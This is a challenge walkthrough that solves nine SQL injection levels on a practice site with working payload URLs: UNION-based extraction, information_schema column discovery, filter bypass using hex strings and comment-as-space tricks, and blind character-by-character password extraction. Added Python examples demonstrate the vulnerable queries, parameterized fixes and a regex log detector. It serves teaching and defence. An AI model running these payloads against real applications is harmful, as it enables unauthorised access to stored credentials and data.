Solving SQL injection tasks from alexbers.com/sql

I want to share with Habrahabr an example of my solutions to the SQL injection tasks on the alexbers website.

Example 1: www.alexbers.com/sql/1.php

This is not even a real example: you are asked to write the query yourself, with the table and the user name known in advance to everyone.
Given: 
Table: users
Fields: id, login, pass 

Solution:
select * from users where id = '12'

and the link will look like this:
https://www.alexbers.com/sql/1.php?text=select+*+from+users+where+id%3D%2712%27

It is just a query built from the data we already know.

Example 2: www.alexbers.com/sql/qnbutn2.php

We are shown the query:
select * from users where id = 2 or login = '$text'

Given:
Table: users
Fields: id, login, pass 
Requirement: Hooray, I know the answer (user password with id = 9):

This example shows the most primitive vulnerability: the input is not filtered in any way. Therefore we can use a quotation mark:
https://www.alexbers.com/sql/qnbutn2.php?text=-1' or id='9

What did we do? We turned the query into this form:
select * from users where id = 2 or login = '-1' or id = '9'

We select from users every row where id=2, or login=-1, or id=9; the 9 is opened by our own quotation mark and closed by the quotation mark already present in the original query. No user with login -1 exists, so that condition returns nothing, but a user with id=9 does exist. As a result we get 2 rows: the user with id=2 and the user with id=9.

Example 3: www.alexbers.com/sql/sdjjy3.php

Again the query is shown:
select * from users where id = 2 or login = '$text' limit 1

Given:
Table: users
Fields: id, login, pass 
Requirement: Hooray, I know the answer (user password with id = 13):

The difference from the previous example is that the output is restricted to 1 row. That restriction goes away once we insert a comment that "removes" the end of the line, i.e. everything after it is not processed.

Solution:
https://www.alexbers.com/sql/sdjjy3.php?text=-1' or id=13 -- 123

The query becomes:
select * from users where id = 2 or login = '-1' or id = 13 -- 123' limit 1

Thus we throw away the limit and extract the user with id = 13.
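To make the level 2 and level 3 mechanics concrete from the defender's side, here is an added example (not code from the original post or from alexbers.com) that rebuilds both vulnerable query shapes in Python against a constructed SQLite table standing in for the MySQL users table, and puts the parameterized form of the same query next to them. The table contents, the pw-* passwords and the function names are assumptions made for the demonstration.

```python
import sqlite3

# Constructed demo table standing in for the challenge's MySQL "users" table.
# SQLite is used so the example runs offline; the injection mechanics are identical.
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, pass TEXT);
INSERT INTO users VALUES (2, 'alice', 'pw-alice'), (9, 'bob', 'pw-bob'), (13, 'carol', 'pw-carol');
""")

def ids(rows):
    # Reduce result rows to a sorted list of ids so results are easy to compare.
    return sorted(r[0] for r in rows)

def level2_vulnerable(text):
    # Level-2 shape: the parameter is pasted straight into the SQL string.
    sql = f"select * from users where id = 2 or login = '{text}'"
    return ids(conn.execute(sql).fetchall())

def level3_vulnerable(text):
    # Level-3 shape: the same, with "limit 1" appended after the injection point.
    sql = f"select * from users where id = 2 or login = '{text}' limit 1"
    return ids(conn.execute(sql).fetchall())

def level3_parameterized(text):
    # Fix: the value travels as a bound parameter. It is only ever compared against
    # login as one string, so the query text itself can no longer change.
    sql = "select * from users where id = 2 or login = ? limit 1"
    return ids(conn.execute(sql, (text,)).fetchall())

LEVEL2_PAYLOAD = "-1' or id='9"         # the level-2 input from the writeup
LEVEL3_PAYLOAD = "-1' or id=13 -- 123"  # the level-3 input; "-- " starts a comment

if __name__ == "__main__":
    print(level2_vulnerable(LEVEL2_PAYLOAD))      # [2, 9]: the injected or id='9' adds a row
    print(level3_vulnerable(LEVEL2_PAYLOAD))      # [2]: limit 1 hides the extra row
    print(level3_vulnerable(LEVEL3_PAYLOAD))      # [2, 13]: the comment swallows "' limit 1"
    print(level3_parameterized(LEVEL3_PAYLOAD))   # [2]: the payload is just a login nobody has
```

With the bound parameter the whole payload is compared as a single string against login, so neither the extra quotation mark nor the comment can alter the query; a row only comes back for a login that really exists.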

Example 4: www.alexbers.com/sql/qjqhweh4.php

Query:
select * from users where id = 2 or login = '$text' limit 1

Given:
Tables: users, secret
Fields: id, login, pass - these are in users. The secret table has 3 fields
Requirement: Hooray, I know the answer (data from the secret table where the field ggg = abc):

A bit more interesting. Now there are 2 tables, and the query does not run against the one we need. We use the classic approach: MySQL has an operator that lets one query read from different tables, UNION. For UNION to work, every part of the combined query must return the same number of columns. For this task we need the row of the secret table whose field ggg=abc. Both tables have the same number of columns (3), so the query takes the form:

Request:
https://www.alexbers.com/sql/qjqhweh4.php?text=-1'+union+select+*+from+secret+where+ggg='abc'+--+123

One of the results will be the answer to the level.

Example 5: www.alexbers.com/sql/sdfkjsdk5.php

Query:
select * from users where id = 2 or login = '$text' limit 1

Given:
Tables: users, secret
Fields: id, login, pass - these are in users. The secret table has 2 fields
Requirement: Hooray, I know the answer (data from the secret table):

Let's try to repeat the previous example. We already know how many columns the users table has (3), and we need the list of columns in the secret table. This time the two tables do not have the same number of columns, so UNION has to be used differently: we pad the column list to 3 and read the column names from information_schema.
https://www.alexbers.com/sql/sdfkjsdk5.php?text=1'+union+select+1,concat_ws(0x3a,table_name,column_name),3+from+information_schema.columns+where+table_name='secret'+--+123

We see that our secret table has 2 columns; now we extract their values:
https://www.alexbers.com/sql/sdfkjsdk5.php?text=-1' union select 1, dfgdfgfdg, dfgfddfgdfdfdf from secret -- 123

We see the answer.

Example 6: www.alexbers.com/sql/skldj6.php

Query:
select * from users where id = $text limit 1

Given:
Tables: users
Fields: id, login, pass - these are in users.
Quotation marks are filtered; only 1 row is returned from the database
Requirement: Hurray, I know the answer (user password with the nickname god):

Here you can see a misunderstanding of how mysql_real_escape_string() works: the value of the id variable is not placed in quotation marks, so even if quotes are filtered 50 times it does not matter, because we do not need them at all. For text values we can use the CHAR() function or write the string in hex (0x676f64 below is the string god):
https://www.alexbers.com/sql/skldj6.php?text=-1 union select id, login, pass from users where login = 0x676f64
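An added example (not from the original post or the challenge site) of the level 6 mistake: a quote-escaping filter, modelled here on mysql_real_escape_string() by a simplified escape_quotes() helper, is applied to a value that is then used unquoted in a numeric comparison. The constructed SQLite table, the char(103,111,100) spelling of god (the page itself points at CHAR() as the quote-free alternative) and the function names are assumptions of this demo, not part of the challenge.

```python
import re
import sqlite3

# Constructed demo table (SQLite standing in for MySQL). Level-6 shape: the id
# value is used unquoted in the query.
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE users (id INTEGER PRIMARY KEY, login TEXT, pass TEXT);
INSERT INTO users VALUES (2, 'alice', 'pw-alice'), (7, 'god', 'pw-god');
""")

def escape_quotes(value):
    # Simplified stand-in for mysql_real_escape_string(): backslash-escapes quotes
    # and backslashes. That only helps when the value ends up inside quotes.
    return re.sub(r"(['\"\\])", r"\\\1", value)

def lookup_escaped_only(text):
    # Level-6 shape: id is numeric and unquoted, so quote escaping guards nothing.
    sql = f"select * from users where id = {escape_quotes(text)} limit 1"
    return conn.execute(sql).fetchall()

def lookup_typed(text):
    # Fix: enforce the type first, then bind. int() rejects anything that is not
    # an integer, so no SQL fragment can ever reach the query text.
    try:
        user_id = int(text)
    except ValueError:
        return None            # reject the request; no query runs
    return conn.execute("select * from users where id = ? limit 1", (user_id,)).fetchall()

# Quote-free input in the spirit of level 6: the string 'god' is written as
# char(103,111,100), which both MySQL and SQLite understand, so no quote is needed
# and escape_quotes() leaves the input untouched.
PAYLOAD = "-1 union select id, login, pass from users where login = char(103,111,100)"

if __name__ == "__main__":
    print(escape_quotes("a'b"))          # a\'b : the filter does its job on quotes
    print(lookup_escaped_only(PAYLOAD))  # [(7, 'god', 'pw-god')] : but the query still changed
    print(lookup_typed(PAYLOAD))         # None : rejected before any SQL is built
    print(lookup_typed("2"))             # [(2, 'alice', 'pw-alice')]
```

The point is that an escaping function only protects the syntactic context it was written for, a value inside single quotes. When the value is pasted into a numeric position, nothing in the input needs a quote, so the filter is a no-op; checking the type with int() and binding the value as a parameter closes the hole regardless of context.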


Example 7: www.alexbers.com/sql/dsfhsdjkf7.php

Given:
Tables: users
Fields: id, login, pass - these are in users. Now only the first row of the result is ever displayed (the rest are hidden)
The characters ', ", +, =, comma, space and brackets are filtered
Requirement: Hooray, I know the answer (user password, with a nickname containing gentoo):

Query:
select * from users where id = $text limit 1

Since the query already selects from the table we need, we do not even have to use a second query. Spaces are replaced with the comments /**/ and /*!*/; the only remaining problem is that the equals sign is filtered, but it can be bypassed with the LIKE operator. Comparing against a string would require quotation marks, so we encode the string in hex. Also, we do not know the exact nickname we are looking for, so we use a pattern search with the % wildcard (0x2567656e746f6f25 is %gentoo%). The resulting attack vector takes the form:
https://www.alexbers.com/sql/dsfhsdjkf7.php?text=-1/*!or/*!login*/like/**/0x2567656e746f6f25


Example 8: www.alexbers.com/sql/qqqwwweeerrr8.php

Query:
select * from users where id = $text

Given:
Tables: users
Fields: id, login, pass - these are in users.
Hint: error messages are not displayed
Requirement: Hooray, I know the answer (user password, with the nickname fast)

The only thing displayed to us is either the fact that some error occurred or the number of records returned. That number of records is the only value we can control. We need to obtain a user's password, which is alphanumeric information, while all we can work with is numbers. So the password has to be represented numerically: if each character is converted to its ASCII code, every character of the password becomes a number. We use the mid() function to pick out a single character and the ascii() function to get its code, so the attack vector looks like this:
https://www.alexbers.com/sql/qqqwwweeerrr8.php?text=-1 or id<=(select ascii(mid(pass,1,1)) from users where login='fast')

The output gives us the ASCII code of the first character of the password. Then we make a request for the second character, and so on.
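Looking at the same payloads from the detection side, here is an added example (not part of the original post) that scans a constructed web-server access-log excerpt for the injection patterns used in levels 2 to 8 above: the quote-plus-or tautology, UNION SELECT, comment terminators and MySQL's /*! ... */ inline comments, long hex literals, character-extraction functions, sub-selects and information_schema probing. The log lines, IP addresses and rule names are invented for the demo; the query strings are the writeup's own payloads, URL-encoded the way a browser would send them.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log excerpt (not real traffic). The query strings reuse payloads
# from the writeup, URL-encoded the way a browser would send them; IPs are invented.
LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2020:10:00:00 +0000] "GET /sql/qnbutn2.php?text=alice HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2020:10:00:01 +0000] "GET /sql/qnbutn2.php?text=-1%27+or+id%3D%279 HTTP/1.1" 200 740',
    '10.0.0.7 - - [01/Jan/2020:10:00:02 +0000] "GET /sql/qjqhweh4.php?text=-1%27+union+select+*+from+secret+where+ggg%3D%27abc%27+--+123 HTTP/1.1" 200 900',
    '10.0.0.7 - - [01/Jan/2020:10:00:03 +0000] "GET /sql/dsfhsdjkf7.php?text=-1/*!or/*!login*/like/**/0x2567656e746f6f25 HTTP/1.1" 200 300',
    '10.0.0.7 - - [01/Jan/2020:10:00:04 +0000] "GET /sql/qqqwwweeerrr8.php?text=-1+or+id%3C%3D(select+ascii(mid(pass,1,1))+from+users+where+login%3D%27fast%27) HTTP/1.1" 200 210',
    '10.0.0.7 - - [01/Jan/2020:10:00:05 +0000] "GET /sql/sdfkjsdk5.php?text=1%27+union+select+1,concat_ws(0x3a,table_name,column_name),3+from+information_schema.columns+where+table_name%3D%27secret%27+--+123 HTTP/1.1" 200 1800',
    '10.0.0.9 - - [01/Jan/2020:10:00:06 +0000] "GET /sql/1.php?text=hello+world HTTP/1.1" 200 100',
]

# Detection rules: (name, regex). Each one captures one trick used in the levels above.
RULES = [
    ("quote-or-tautology",   re.compile(r"'\s*or\s+\w+\s*=", re.I)),                     # levels 2-3
    ("union-select",         re.compile(r"\bunion\s+select\b", re.I)),                   # levels 4-6
    ("comment-terminator",   re.compile(r"--\s|#|/\*")),                                 # levels 3-7
    ("inline-mysql-comment", re.compile(r"/\*!")),                                       # level 7
    ("hex-literal",          re.compile(r"\b0x[0-9a-f]{4,}\b", re.I)),                   # levels 6-7
    ("char-extraction",      re.compile(r"\b(ascii|ord|mid|substr(ing)?)\s*\(", re.I)),  # level 8
    ("subselect",            re.compile(r"\(\s*select\b", re.I)),                        # levels 8-9
    ("schema-probe",         re.compile(r"\binformation_schema\b", re.I)),               # level 5
]

def query_string(line):
    # Pull the raw query string out of a combined-log-format GET request line.
    m = re.search(r'"GET\s+\S+?\?(\S*)\s+HTTP/', line)
    return m.group(1) if m else ""

def scan(line):
    # Match every rule against the decoded query string and against a copy in which
    # /*...*/ comment markers are replaced by spaces, so the space-less level-7
    # form is also seen in its plain shape.
    decoded = unquote_plus(query_string(line))
    stripped = re.sub(r"\s+", " ", re.sub(r"/\*!?|\*/", " ", decoded))
    return [name for name, rx in RULES if rx.search(decoded) or rx.search(stripped)]

def scan_log(lines):
    # Return {line_index: [rule names]} for every line with at least one hit.
    findings = {}
    for i, line in enumerate(lines):
        hits = scan(line)
        if hits:
            findings[i] = hits
    return findings

if __name__ == "__main__":
    for i, hits in scan_log(LOG_LINES).items():
        print(i, hits)
```

The two benign requests (alice, hello world) produce no hits, while each attack line is tagged with the tricks it uses. A real deployment would also need to look at POST bodies and at response sizes or row counts, because the blind extraction of level 8 leaves only a difference in the number of rows behind, and the keywords in such requests are easy to vary.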

Example 9: www.alexbers.com/sql/almost9.php

Tables: users
Fields: id, login, pass - these are in users.
Query: select * from users where id = $text
Required: "Hooray, I know the answer (the numerical sum of user logins with 20 <= id <= 30)."

That is, we need to take the numeric value of each login and add them up. Here we use the same comparison as before, and the attack vector is split into 2 queries:
https://www.alexbers.com/sql/almost9.php?text=-1 or id<=cast((select sum(login) from users where id between 20 and 30) as signed INTEGER)/10
https://www.alexbers.com/sql/almost9.php?text=-1 or id<=MOD(cast((select sum(login) from users where id between 20 and 30) as signed INTEGER), 10)

There are 1069 entries in the table, so we won’t be able to display the answer in one

Example 10



The solution to task 10 is already described on YouTube; you can watch it here: www.youtube.com/watch?v=dLSxTGvwcLw
